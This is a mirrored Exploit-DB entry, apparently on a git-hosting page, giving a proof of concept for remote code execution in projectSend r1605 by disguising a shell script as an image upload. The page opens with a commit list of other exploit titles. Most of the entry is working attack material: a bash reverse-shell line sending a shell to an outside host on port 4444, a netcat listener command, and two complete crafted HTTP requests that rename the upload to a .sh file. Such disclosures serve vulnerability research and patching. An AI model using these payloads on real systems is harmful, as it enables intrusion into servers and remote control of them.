bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51238.txt
Exploit-DB d46ab98863 DB: 2023-04-06 
32 changes to exploits/shellcodes/ghdb

Answerdev 1.0.3 - Account Takeover

D-Link DIR-846 - Remote Command Execution (RCE) vulnerability

Dell EMC Networking PC5500 firmware versions 4.1.0.22 and  Cisco Sx / SMB - Information Disclosure

SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow

ERPNext 12.29 - Cross-Site Scripting (XSS)

Liferay Portal 6.2.5 - Insecure Permissions

GNU screen v4.9.0 - Privilege Escalation

Apache Tomcat 10.1 - Denial Of Service

PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)

BTCPay Server v1.7.4 - HTML Injection.

Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)

Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)

ImageMagick 7.1.0-49 - DoS

bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)

Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)

Calendar Event Multi View  1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)

CKEditor 5 35.4.0 - Cross-Site Scripting (XSS)

Control Web Panel 7 (CWP7) v0.9.8.1147 -  Remote Code Execution (RCE)

Froxlor 2.0.3 Stable - Remote Code Execution (RCE)

ImageMagick 7.1.0-49 - Arbitrary File Read

itech TrainSmart r1044 - SQL injection

Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)

PhotoShow 3.0 - Remote Code Execution

projectSend r1605 - Remote Code Exectution RCE

Responsive FileManager 9.9.5 - Remote Code Execution (RCE)

zstore 6.6.0 - Cross-Site Scripting (XSS)

Binwalk v2.3.2 - Remote Command Execution (RCE)

XWorm Trojan 2.1 - Null Pointer Derefernce DoS

Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)

Linux/x86_64 - bash Shellcode with xor encoding
2023-04-06 00:16:31 +00:00

132 lines
No EOL
4.1 KiB
Text
Raw Blame History

Exploit Title: projectSend r1605 - Remote Code Exectution RCE
Application: projectSend
Version: r1605
Bugs: rce via file extension manipulation
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 26-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux
POC video: https://youtu.be/Ln7KluDfnk4
2. Technical Details & POC
========================================
1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files.
bash -i >& /dev/tcp/192.168.100.18/4444 0>&1
2.Then the attacker starts listening for ip and port
nc -lvp 4444
3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg
POST /includes/upload.process.php HTTP/1.1
Host: localhost
Content-Length: 525
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="name"
openme.sh;jpg
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunk"
0
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunks"
1
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream
bash -i >& /dev/tcp/192.168.100.18/4444 0>&1
------WebKitFormBoundary0enbZuQQAtahFVjI--
4.In the second request, we do this to the filename section at the bottom.
openme.sh
POST /files-edit.php?ids=34 HTTP/1.1
Host: localhost
Content-Length: 1016
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/files-edit.php?ids=34&type=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="csrf_token"
66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][id]"
34
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][original]"
openme.sh;.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][file]"
1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][name]"
openme.sh
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][description]"
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][expiry_date]"
25-02-2023
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="save"
------WebKitFormBoundaryc8btjvyb3An7HcmA--
And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce
private youtube video poc : https://youtu.be/Ln7KluDfnk4
Reference in a new issue View git blame Copy permalink